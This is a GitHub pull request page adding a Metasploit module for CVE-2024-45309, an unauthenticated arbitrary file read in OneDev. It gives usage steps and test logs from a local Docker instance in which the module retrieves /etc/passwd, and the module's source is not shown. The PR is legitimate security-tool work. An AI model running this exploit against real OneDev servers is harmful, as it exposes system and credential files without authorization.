Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

OneDev Unauthenticated Arbitrary File Read (CVE-2024-45309) #19614

Merged
merged 12 commits into from
Jan 7, 2025
Merged

OneDev Unauthenticated Arbitrary File Read (CVE-2024-45309) #19614

merged 12 commits into from
Jan 7, 2025

Conversation

vultza
Copy link
Contributor

@vultza vultza commented Nov 2, 2024

This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8.

Verification

A vulnerable Docker image version (v11.0.8) can be found here.

  1. Setup the OneDev application
  2. Start msfconsole
  3. Do: use auxiliary/gather/onedev_arbitrary_file_read
  4. Set the RHOSTS and RPORT options as necessary
  5. Set the TARGETFILE option with the absolute path of the target file to read

If a valid project name is known:

  1. Set the PROJECT_NAME option with the known project name
  2. Do: run
  3. If the file exists, the contents will be displayed to the user

If there is no information about existing projects:

  1. Set the PROJECT_NAMES_FILE option with the absolute path of a wordlist that contains multiple possible values for a valid project name
  2. Do: run
  3. If a valid project name is found, the target file contents will be displayed to the user

@jheysel-r7 jheysel-r7 self-assigned this Nov 28, 2024
@jheysel-r7 jheysel-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Nov 28, 2024
jheysel-r7
jheysel-r7 reviewed Nov 29, 2024
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the responses @vultza. Things are looking good, just a couple comments. Testing was as expected 👍

msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAME my_vulnerable_project
PROJECT_NAME => my_vulnerable_project
msf6 auxiliary(gather/onedev_arbitrary_file_read) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 auxiliary(gather/onedev_arbitrary_file_read) > set rport 6610
rport => 6610
ryumsf6 auxiliary(gather/onedev_arbitrary_file_read) > run
[*] Running module against 127.0.0.1

[+] /etc/passwd file retrieved with success.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin

[*] Auxiliary module execution completed

documentation/modules/auxiliary/gather/onedev_arbitrary_file_read.md Outdated Show resolved Hide resolved
documentation/modules/auxiliary/gather/onedev_arbitrary_file_read.md Outdated Show resolved Hide resolved
modules/auxiliary/gather/onedev_arbitrary_file_read.rb Show resolved Hide resolved
@jheysel-r7 jheysel-r7 removed their assignment Dec 16, 2024
@jheysel-r7 jheysel-r7 self-assigned this Dec 30, 2024
jheysel-r7
jheysel-r7 approved these changes Jan 7, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hey @vultza, thanks so much for making those changes. Everything looks great and testing was as expected 👍

msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAME my_vulnerable_project
PROJECT_NAME => my_vulnerable_project
msf6 auxiliary(gather/onedev_arbitrary_file_read) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 auxiliary(gather/onedev_arbitrary_file_read) > set rport 6610
rport => 6610
msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. OneDev instance is vulnerable.
[+] /etc/passwd file retrieved with success.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
messagebus:x:100:101::/nonexistent:/usr/sbin/nologin

[*] Auxiliary module execution completed
msf6 auxiliary(gather/onedev_arbitrary_file_read) > check
[*] 127.0.0.1:6610 - The target appears to be vulnerable. OneDev instance is vulnerable.
msf6 auxiliary(gather/onedev_arbitrary_file_read) > reload
[*] Reloading module...
msf6 auxiliary(gather/onedev_arbitrary_file_read) > check
[+] 127.0.0.1:6610 - The target is vulnerable. OneDev instance is vulnerable.
msf6 auxiliary(gather/onedev_arbitrary_file_read) >

modules/auxiliary/gather/onedev_arbitrary_file_read.rb Outdated Show resolved Hide resolved
@jheysel-r7 jheysel-r7 merged commit 817557c into rapid7:master Jan 7, 2025
37 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

This adds an exploit module for an unauthenticated arbitrary file read vulnerability, tracked as CVE-2024-45309, which affects OneDev versions <= 11.0.8.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Chocapikk Chocapikk Chocapikk left review comments

@jvoisin jvoisin jvoisin left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@vultza @jheysel-r7 @jvoisin @Chocapikk